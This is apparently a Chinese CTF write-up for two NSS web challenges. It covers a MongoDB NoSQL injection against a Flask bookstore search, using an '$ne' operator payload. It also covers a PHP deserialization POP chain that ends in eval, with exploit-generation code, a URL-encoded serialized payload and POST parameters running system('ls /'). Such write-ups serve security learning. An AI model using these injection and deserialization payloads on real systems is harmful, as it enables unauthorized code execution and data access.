NSS_4th web ez_signin 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 from flask import Flask, request, render_template, jsonify from pymongo import MongoClient import re app = Flask(__name__) client = MongoClient("mongodb://localhost:27017/") db = client['aggie_bookstore'] books_collection = db['books'] def sanitize(input_str: str) -> str: return re.sub(r'[^a-zA-Z0-9\s]', '', input_str) @app.route('/') def index(): return render_template('index.html', books=None) @app.route('/search', methods=['GET', 'POST']) def search(): query = {"$and": []} books = [] if request.method == 'GET': title = request.args.get('title', '').strip() author = request.args.get('author', '').strip() title_clean = sanitize(title) author_clean = sanitize(author) if title_clean: query["$and"].append({"title": {"$eq": title_clean}}) if author_clean: query["$and"].append({"author": {"$eq": author_clean}}) if query["$and"]: books = list(books_collection.find(query)) return render_template('index.html', books=books) elif request.method == 'POST': if request.content_type == 'application/json': try: data = request.get_json(force=True) title = data.get("title") author = data.get("author") if isinstance(title, str): title = sanitize(title) query["$and"].append({"title": title}) elif isinstance(title, dict): query["$and"].append({"title": title}) if isinstance(author, str): author = sanitize(author) query["$and"].append({"author": author}) elif isinstance(author, dict): query["$and"].append({"author": author}) if query["$and"]: books = list(books_collection.find(query)) return jsonify([ {"title": b.get("title"), "author": b.get("author"), "description": b.get("description")} for b in books ]) return jsonify({"error": "Empty query"}), 400 except Exception as e: return jsonify({"error": str(e)}), 500 return jsonify({"error": "Unsupported Content-Type"}), 400 if __name__ == "__main__": app.run("0.0.0.0", 8000)
很明显是 MongoDB 注入 {"title": {"$ne": ""}}
[mpga]filesystem 简单的php反序列化
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 <?php class ApplicationContext{ public $contextName; public function __construct(){ $this->contextName = 'ApplicationContext'; } public function __destruct(){ $this->contextName = strtolower($this->contextName); } } class ContentProcessor{ // private $processedContent; public $processedContent; public $callbackFunction; public function __construct(){ $this->processedContent = new FunctionInvoker(); } public function __get($key){ if (property_exists($this, $key)) { if (is_object($this->$key) && is_string($this->callbackFunction)) { $this->$key->{$this->callbackFunction}($_POST['cmd']); } } } } class FileManager{ public $targetFile; public $responseData = 'default_response'; public function __construct($targetFile = null){ $this->targetFile = $targetFile; } public function filterPath(){ if(preg_match('/^\/|php:|data|zip|\.\.\//i',$this->targetFile)){ die('文件路径不符合规范'); } } public function performWriteOperation($var){ $targetObject = $this->targetFile; $value = $targetObject->$var; } public function getFileHash(){ $this->filterPath(); if (is_string($this->targetFile)) { if (file_exists($this->targetFile)) { $md5_hash = md5_file($this->targetFile); return "文件MD5哈希: " . htmlspecialchars($md5_hash); } else { die("文件未找到"); } } else if (is_object($this->targetFile)) { try { $md5_hash = md5_file($this->targetFile); return "文件MD5哈希 (尝试): " . htmlspecialchars($md5_hash); } catch (TypeError $e) { return "无法计算MD5哈希,因为文件参数无效: " . htmlspecialchars($e->getMessage()); } } else { die("文件未找到"); } } public function __toString(){ if (isset($_POST['method']) && method_exists($this, $_POST['method'])) { $method = $_POST['method']; $var = isset($_POST['var']) ? $_POST['var'] : null; $this->$method($var); } return $this->responseData; } } class FunctionInvoker{ public $functionName; public $functionArguments; public function __call($name, $arg){ if (function_exists($name)) { $name($arg[0]); } } } $a=new ApplicationContext(); $b=new FileManager(); $c=new ContentProcessor(); $d=new FunctionInvoker(); $a->contextName=$b; $b->targetFile=$c; $c->processedContent=$d; $c->callbackFunction="eval"; print_r(urlencode((serialize($a)))); <!-- $action = isset($_GET['action']) ? $_GET['action'] : 'home'; $output = ''; $upload_dir = "upload/"; if (!is_dir($upload_dir)) { mkdir($upload_dir, 0777, true); } if ($action === 'upload_file') { if(isset($_POST['submit'])){ if (isset($_FILES['upload_file']) && $_FILES['upload_file']['error'] == UPLOAD_ERR_OK) { $allowed_extensions = ['txt', 'png', 'gif', 'jpg']; $file_info = pathinfo($_FILES['upload_file']['name']); $file_extension = strtolower(isset($file_info['extension']) ? $file_info['extension'] : ''); if (!in_array($file_extension, $allowed_extensions)) { $output = "<p class='text-red-600'>不允许的文件类型。只允许 txt, png, gif, jpg。</p>"; } else { $unique_filename = md5(time() . $_FILES['upload_file']['name']) . '.' . $file_extension; $upload_path = $upload_dir . $unique_filename; $temp_file = $_FILES['upload_file']['tmp_name']; if (move_uploaded_file($temp_file, $upload_path)) { $output = "<p class='text-green-600'>文件上传成功!</p>"; $output .= "<p class='text-gray-700'>文件路径:<code class='bg-gray-200 p-1 rounded'>" . htmlspecialchars($upload_path) . "</code></p>"; } else { $output = "<p class='text-red-600'>上传失败!</p>"; } } } else { $output = "<p class='text-red-600'>请选择一个文件上传。</p>"; } } } if ($action === 'home' && isset($_POST['submit_md5'])) { $filename_param = isset($_POST['file_to_check']) ? $_POST['file_to_check'] : ''; if (!empty($filename_param)) { $file_object = @unserialize($filename_param); if ($file_object === false || !($file_object instanceof FileManager)) { $file_object = new FileManager($filename_param); } $output = $file_object->getFileHash(); } else { $output = "<p class='text-gray-600'>请输入文件路径进行MD5校验。</p>"; } } ?> <!DOCTYPE html> <html lang="zh"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>文件管理系统</title> <script src="https://cdn.tailwindcss.com"></script> <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;600&display=swap" rel="stylesheet"> <style> body { font-family: 'Inter', sans-serif; } </style> </head> <body class="bg-gray-100 flex items-center justify-center min-h-screen px-4 py-8"> <div class="bg-white p-6 md:p-8 rounded-lg shadow-md w-full max-w-4xl mx-auto"> <h1 class="text-3xl font-bold mb-6 text-gray-800 text-center">文件管理系统</h1> <div class="flex justify-center mb-6 space-x-4"> <a href="?action=home" class="py-2 px-4 rounded-lg font-semibold <?php echo $action === 'home' ? 'bg-indigo-600 text-white' : 'bg-indigo-100 text-indigo-800 hover:bg-indigo-200'; ?>">主页</a> <a href="?action=upload_file" class="py-2 px-4 rounded-lg font-semibold <?php echo $action === 'upload_file' ? 'bg-blue-600 text-white' : 'bg-blue-100 text-blue-800 hover:bg-blue-200'; ?>">上传文件</a> </div> <?php if ($action === 'home'): ?> <div class="text-center"> <p class="text-lg text-gray-700 mb-4">欢迎使用文件管理系统。</p> <p class="text-sm text-gray-500 mb-6"> 为了确保文件一致性和完整性,请在下载前校验md5值,完成下载后进行对比。 </p> <h2 class="text-2xl font-bold mb-4 text-gray-800">文件列表</h2> <div class="max-h-60 overflow-y-auto border border-gray-200 rounded-lg p-2 bg-gray-50"> <?php $files = array_diff(scandir($upload_dir), array('.', '..')); if (empty($files)) { echo "<p class='text-gray-500'>暂无文件。</p>"; } else { echo "<ul class='text-left space-y-2'>"; foreach ($files as $file) { $file_path = $upload_dir . $file; echo "<li class='flex items-center justify-between p-2 bg-white rounded-md shadow-sm'>"; echo "<span class='text-gray-700 break-all mr-2'>" . htmlspecialchars($file) . "</span>"; echo "<div class='flex space-x-2'>"; echo "<a href='" . htmlspecialchars($file_path) . "' download class='bg-blue-500 hover:bg-blue-600 text-white text-xs py-1 px-2 rounded-lg transition duration-300 ease-in-out'>下载</a>"; echo "<form action='?action=home' method='POST' class='inline-block'>"; echo "<input type='hidden' name='file_to_check' value='" . htmlspecialchars($file_path) . "'>"; echo "<button type='submit' name='submit_md5' class='bg-purple-500 hover:bg-purple-600 text-white text-xs py-1 px-2 rounded-lg transition duration-300 ease-in-out'>校验MD5</button>"; echo "</form>"; echo "</div>"; echo "</li>"; } echo "</ul>"; } ?> </div> <?php if (!empty($output)): ?> <div class="mt-6 p-4 bg-gray-50 border border-gray-200 rounded-lg"> <h3 class="lg font-semibold mb-2 text-gray-800">校验结果:</h3> <?php echo $output; ?> </div> <?php endif; ?> </div> <?php elseif ($action === 'upload_file'): ?> <h2 class="text-2xl font-bold mb-4 text-gray-800 text-center">上传文件</h2> <form action="?action=upload_file" method="POST" enctype="multipart/form-data" class="space-y-4"> <label for="upload_file" class="block text-gray-700 text-sm font-bold mb-2">选择文件:</label> <input type="file" name="upload_file" id="upload_file" class="block w-full text-sm text-gray-900 border border-gray-300 rounded-lg cursor-pointer bg-gray-50 focus:outline-none"> <button type="submit" name="submit" class="w-full bg-blue-500 hover:bg-blue-600 text-white font-semibold py-2 px-4 rounded-lg transition duration-300 ease-in-out"> 上传 </button> </form> <?php if (!empty($output)): ?> <div class="mt-6 p-4 bg-gray-50 border border-gray-200 rounded-lg"> <h3 class="text-lg font-semibold mb-2 text-gray-800">上传结果:</h3> <?php echo $output; ?> </div> <?php endif; ?> <p class="mt-6 text-center text-sm text-gray-500"> 只允许上传 .txt, .png, .gif, .jpg 文件。 </p> <?php endif; ?> </div> </body> </html> -->
O%3A18%3A%22ApplicationContext%22%3A1%3A%7Bs%3A11%3A%22contextName%22%3BO%3A11%3A%22FileManager%22%3A2%3A%7Bs%3A10%3A%22targetFile%22%3BO%3A16%3A%22ContentProcessor%22%3A2%3A%7Bs%3A16%3A%22processedContent%22%3BO%3A15%3A%22FunctionInvoker%22%3A2%3A%7Bs%3A12%3A%22functionName%22%3BN%3Bs%3A17%3A%22functionArguments%22%3BN%3B%7Ds%3A16%3A%22callbackFunction%22%3Bs%3A4%3A%22eval%22%3B%7Ds%3A12%3A%22responseData%22%3Bs%3A16%3A%22default_response%22%3B%7D%7DO%3A18%3A%22ApplicationContext%22%3A1%3A%7Bs%3A11%3A%22contextName%22%3BO%3A11%3A%22FileManager%22%3A2%3A%7Bs%3A10%3A%22targetFile%22%3BO%3A16%3A%22ContentProcessor%22%3A2%3A%7Bs%3A16%3A%22%00ContentProcessor%00processedContent%22%3BO%3A15%3A%22FunctionInvoker%22%3A2%3A%7Bs%3A12%3A%22functionName%22%3BN%3Bs%3A17%3A%22functionArguments%22%3BN%3B%7Ds%3A16%3A%22callbackFunction%22%3Bs%3A4%3A%22eval%22%3B%7Ds%3A12%3A%22responseData%22%3Bs%3A16%3A%22default_response%22%3B%7D%7Dmethod=performWriteOperation&var=processedContent&cmd=system('ls /');
